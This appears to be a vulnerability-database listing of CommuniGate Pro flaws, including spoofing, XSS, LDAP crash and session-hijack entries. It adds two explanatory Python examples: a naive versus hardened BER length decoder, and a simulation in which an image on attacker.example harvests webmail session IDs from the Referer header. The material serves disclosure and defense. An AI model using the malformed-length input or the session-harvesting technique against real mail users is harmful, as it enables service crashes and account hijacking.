
CVSS: 5.7EPSS: 0%CPEs: 1EXPL: 1

The "XML Interface to Messaging, Scheduling, and Signaling" (XIMSS) protocol implementation in CommuniGate Pro (CGP) 6.2 is missing XIMSS protocol validation, which leads to an email spoofing attack: a malicious authenticated attacker can send a message from any source email address. The attack uses an HTTP POST request to the /Session URI and interchanges the XML From and To elements. • https://packetstormsecurity.com/files/145724/communigatepro62-spoof • CWE-287: Improper Authentication •

CVSS: 4.3EPSS: 6%CPEs: 2EXPL: 1

Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when the client is Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. • https://www.exploit-db.com/exploits/30027 http://marc.info/?l=full-disclosure&m=117900749209206&w=2 http://osvdb.org/36017 http://secunia.com/advisories/25250 http://www.communigate.com/CommuniGatePro/History51.html http://www.scanit.be/advisory-2007-05-12.html http://www.securityfocus.com/bid/23950 http://www.securitytracker.com/id?1018048 http://www.vupen.com/english/advisories/2007/1795 https://exchange.xforce.ibmcloud.com/vulnerabilities/34266 •

CVSS: 7.5EPSS: 31%CPEs: 14EXPL: 1

CommuniGate Pro Core Server before 5.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via LDAP messages with negative BER lengths, and possibly other vectors, as demonstrated by the ProtoVer LDAP test suite. • https://www.exploit-db.com/exploits/27144 http://secunia.com/advisories/18640 http://www.gleg.net/advisory_cg.shtml http://www.securityfocus.com/archive/1/423364/100/0/threaded http://www.securityfocus.com/bid/16407 http://www.stalker.com/CommuniGatePro/History.html http://www.vupen.com/english/advisories/2006/0364 https://exchange.xforce.ibmcloud.com/vulnerabilities/24409 •
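The "negative BER length" class of bug described above, as an added example that is not CommuniGate's code or the ProtoVer test suite: a naive BER/LDAP length decoder that emulates reading the long-form length into a signed 32-bit integer, beside a hardened decoder that enforces the definite-form and bounds rules LDAP (RFC 4511) requires. The sample messages are constructed for this example, and the assumption that the vulnerable reader used a signed 32-bit length is the example's, not the advisory's.

```python
import struct

# Constructed samples (not from the advisory):
#   SEQUENCE (len 3) { INTEGER (len 1) 5 }
GOOD_MESSAGE = b"\x30\x03\x02\x01\x05"
#   SEQUENCE with long-form length: 4 length bytes = 0xFFFFFFFF
NEGATIVE_LENGTH_MESSAGE = b"\x30\x84\xff\xff\xff\xff"


def naive_length(buf: bytes, pos: int):
    """Insecure decoder (assumed behaviour): decodes the BER length field at
    buf[pos] and stores it the way a C reader with `int32_t len` would.
    Returns (length, next_pos) with no sign or bounds check."""
    first = buf[pos]
    pos += 1
    if first < 0x80:                       # short form: the byte is the length
        return first, pos
    n = first & 0x7F                       # long form: n following length bytes
    value = int.from_bytes(buf[pos:pos + n], "big")
    pos += n
    # Emulate assignment to a signed 32-bit int: 0xFFFFFFFF becomes -1.
    # A C caller that then passes `len` to memcpy/malloc sees SIZE_MAX.
    length = struct.unpack(">i", struct.pack(">I", value & 0xFFFFFFFF))[0]
    return length, pos


MAX_LENGTH_BYTES = 4  # 4 GiB elements are never legitimate on an LDAP socket


def safe_length(buf: bytes, pos: int):
    """Hardened decoder: definite form only, bounded length-of-length,
    no truncation, and the declared length must fit the remaining buffer."""
    if pos >= len(buf):
        raise ValueError("truncated: no length byte")
    first = buf[pos]
    pos += 1
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0:
            raise ValueError("indefinite length is not allowed in LDAP")
        if n > MAX_LENGTH_BYTES:
            raise ValueError(f"length field of {n} bytes exceeds {MAX_LENGTH_BYTES}")
        if pos + n > len(buf):
            raise ValueError("truncated length field")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    remaining = len(buf) - pos
    if length > remaining:
        raise ValueError(f"declared length {length} exceeds remaining {remaining} bytes")
    return length, pos


def read_element(buf: bytes, pos: int, length_decoder):
    """Read one TLV: returns (tag, value_bytes, next_pos)."""
    tag = buf[pos]
    length, pos = length_decoder(buf, pos + 1)
    return tag, buf[pos:pos + length], pos + length


def check_message(msg: bytes) -> str:
    """Parse the outer element with the hardened decoder and report the verdict."""
    try:
        tag, body, end = read_element(msg, 0, safe_length)
        return f"ok: tag=0x{tag:02x} body={body.hex()}"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print("naive :", naive_length(NEGATIVE_LENGTH_MESSAGE, 1))   # (-1, 6)
    print("safe  :", check_message(NEGATIVE_LENGTH_MESSAGE))
    print("safe  :", check_message(GOOD_MESSAGE))
```

The hardened path rejects the message before any allocation or copy is sized from the attacker's bytes; the naive path hands back -1, which is the value a memcpy or allocator would receive as an unsigned size.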

CVSS: 5.0EPSS: 1%CPEs: 2EXPL: 0

Unknown vulnerability in the LIST functionality in CommuniGate Pro before 4.3c3 allows remote attackers to cause a denial of service (server crash) via certain multipart messages. • http://secunia.com/advisories/14604 http://www.osvdb.org/15257 http://www.stalker.com/CommuniGatePro/History.html https://exchange.xforce.ibmcloud.com/vulnerabilities/19961 •

CVSS: 5.8EPSS: 0%CPEs: 14EXPL: 2

CommuniGate Pro 3.1 through 4.0.6 sends the session ID in the Referer header of an HTTP request for an image, which allows remote attackers to hijack mail sessions via an e-mail with an IMG tag that references a malicious URL whose server captures the Referer. • https://www.exploit-db.com/exploits/27 http://securityreason.com/securityalert/3290 http://www.securityfocus.com/archive/1/320438 http://www.securityfocus.com/bid/7501 https://exchange.xforce.ibmcloud.com/vulnerabilities/11932 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •
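The leak mechanism described above, as an added example that is not CommuniGate's code or the published exploit: the browser rendering a webmail page whose URL carries the session ID fetches an attacker-hosted image and names that page URL in the Referer header, so the image host reads the session ID out of its request log. Both sides of the exchange are built in-process here. The /Session/<id>/ URL layout, the hostnames and the session ID are hypothetical, constructed for this example; the referrer-policy behaviours modelled are the ones modern browsers implement, which browsers of the 2003 era did not have (they sent the full URL, the behaviour the advisory relies on).

```python
import re
from urllib.parse import urlsplit

# Hypothetical URL layout with the session ID as a path segment (assumption).
SESSION_RE = re.compile(r"/Session/([A-Za-z0-9]+)/")


def referer_for(page_url: str, target_url: str, policy: str):
    """What a browser puts in Referer for a sub-resource fetch from page_url.
    Models three policies: 'unsafe-url' (full URL, the legacy default),
    'strict-origin-when-cross-origin' (today's default), 'no-referrer'."""
    page, target = urlsplit(page_url), urlsplit(target_url)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return page_url
    if policy == "strict-origin-when-cross-origin":
        if page.scheme == "https" and target.scheme == "http":
            return None                           # never leak across a downgrade
        if (page.scheme, page.netloc) == (target.scheme, target.netloc):
            return page_url                        # same origin: full URL
        return f"{page.scheme}://{page.netloc}/"   # cross origin: origin only
    raise ValueError(f"unknown policy {policy!r}")


def browser_image_request(img_url: str, page_url: str, policy: str) -> bytes:
    """The raw GET a browser emits for <img src=img_url> embedded in page_url."""
    target = urlsplit(img_url)
    lines = [f"GET {target.path or '/'} HTTP/1.1", f"Host: {target.netloc}"]
    referer = referer_for(page_url, img_url, policy)
    if referer:
        lines.append(f"Referer: {referer}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def extract_session_id(referer: str):
    """Attacker-side parsing: pull the session ID out of a Referer value."""
    match = SESSION_RE.search(referer or "")
    return match.group(1) if match else None


def attacker_host_receive(raw_request: bytes):
    """What the attacker's image host does with the request: parse the
    header block, read Referer, and harvest the session ID if present."""
    head = raw_request.decode("ascii").split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return extract_session_id(headers.get("referer"))


# Constructed sample values (not from the advisory).
WEBMAIL_PAGE = "http://mail.example.com/Session/ABC123DEF456/Mailbox.wssp"
TRACKING_IMAGE = "http://attacker.example/track.gif"


def hijack_attempt(policy: str):
    """End to end: victim's browser renders the mail, attacker host logs it.
    Returns the captured session ID, or None if nothing usable leaked."""
    request = browser_image_request(TRACKING_IMAGE, WEBMAIL_PAGE, policy)
    return attacker_host_receive(request)


if __name__ == "__main__":
    for policy in ("unsafe-url", "strict-origin-when-cross-origin", "no-referrer"):
        print(f"{policy:32s} -> captured {hijack_attempt(policy)!r}")
```

The durable fix is on the server side rather than the browser side: keeping the session identifier out of the URL (cookie-bound sessions) means there is nothing in the Referer to harvest regardless of what policy a client applies.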